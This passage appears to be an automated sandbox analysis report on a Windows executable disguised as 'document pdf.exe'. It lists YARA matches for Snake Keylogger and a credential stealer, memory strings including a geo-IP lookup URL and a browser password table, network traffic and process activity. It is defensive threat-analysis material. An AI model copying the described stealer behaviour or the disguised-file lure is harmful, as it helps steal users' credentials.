                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49847 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: document pdf.exe
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_0306E5A40_2_0306E5A4
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_057174900_2_05717490
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_057174800_2_05717480
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_057106900_2_05710690
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_057106800_2_05710680
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058040D00_2_058040D0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_05804E380_2_05804E38
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058029180_2_05802918
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058098CC0_2_058098CC
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058023610_2_05802361
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058023680_2_05802368
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_058098C40_2_058098C4
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 0_2_0580ABE80_2_0580ABE8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1A0883_2_00F1A088
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1C1463_2_00F1C146
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1D2783_2_00F1D278
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F153623_2_00F15362
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1C4683_2_00F1C468
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1C7383_2_00F1C738
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F169A03_2_00F169A0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1E9883_2_00F1E988
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1CA083_2_00F1CA08
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1CCD83_2_00F1CCD8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F13E093_2_00F13E09
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F16FC83_2_00F16FC8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1CFAA3_2_00F1CFAA
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F129E03_2_00F129E0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1E97A3_2_00F1E97A
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_00F1F9613_2_00F1F961
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06691E803_2_06691E80
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066917A03_2_066917A0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669FC683_2_0669FC68
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06699C703_2_06699C70
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066995483_2_06699548
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06690B303_2_06690B30
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066950283_2_06695028
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066929683_2_06692968
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06691E703_2_06691E70
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669DE003_2_0669DE00
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669E6AF3_2_0669E6AF
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669E6A03_2_0669E6A0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669E6B03_2_0669E6B0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669EF603_2_0669EF60
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669EF513_2_0669EF51
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669178F3_2_0669178F
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669CCA03_2_0669CCA0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669CC8F3_2_0669CC8F
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669D5403_2_0669D540
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669D5503_2_0669D550
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669DDFF3_2_0669DDFF
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669DDF13_2_0669DDF1
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669E24A3_2_0669E24A
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669E2583_2_0669E258
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669EAF83_2_0669EAF8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066993283_2_06699328
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06690B203_2_06690B20
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669EB083_2_0669EB08
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06699BFB3_2_06699BFB
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06698BA03_2_06698BA0
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669F3B83_2_0669F3B8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06698B913_2_06698B91
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066900403_2_06690040
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669F8023_2_0669F802
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066900063_2_06690006
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_066950183_2_06695018
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669F8103_2_0669F810
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669D0F83_2_0669D0F8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669D9A83_2_0669D9A8
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_0669D9993_2_0669D999
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
                Source: document pdf.exe, 00000000.00000002.2271968435.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2272818698.000000000321C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2277432232.0000000007A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2272818698.0000000003216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2275894684.0000000005A40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
                Source: document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs document pdf.exe
                Source: document pdf.exe, 00000003.00000002.4662715149.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs document pdf.exe
                Source: document pdf.exe, 00000003.00000002.4662850359.0000000000B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs document pdf.exe
                Source: document pdf.exe, 00000003.00000002.4662245405.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs document pdf.exe
                Source: document pdf.exeBinary or memory string: OriginalFilenameWCyC.exe8 vs document pdf.exe
                Source: document pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: document pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.43ee280.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, YuRtjF05Y3giqbqHZM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, YuRtjF05Y3giqbqHZM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@5/4
                Source: C:\Users\user\Desktop\document pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document pdf.exe.logJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3420
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\42db4eed-5be4-456b-b922-4da10a7b395dJump to behavior
                Source: document pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: document pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\document pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: document pdf.exe, 00000003.00000002.4665157890.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: document pdf.exeVirustotal: Detection: 73%
                Source: document pdf.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: gpapi.dllJump to behavior
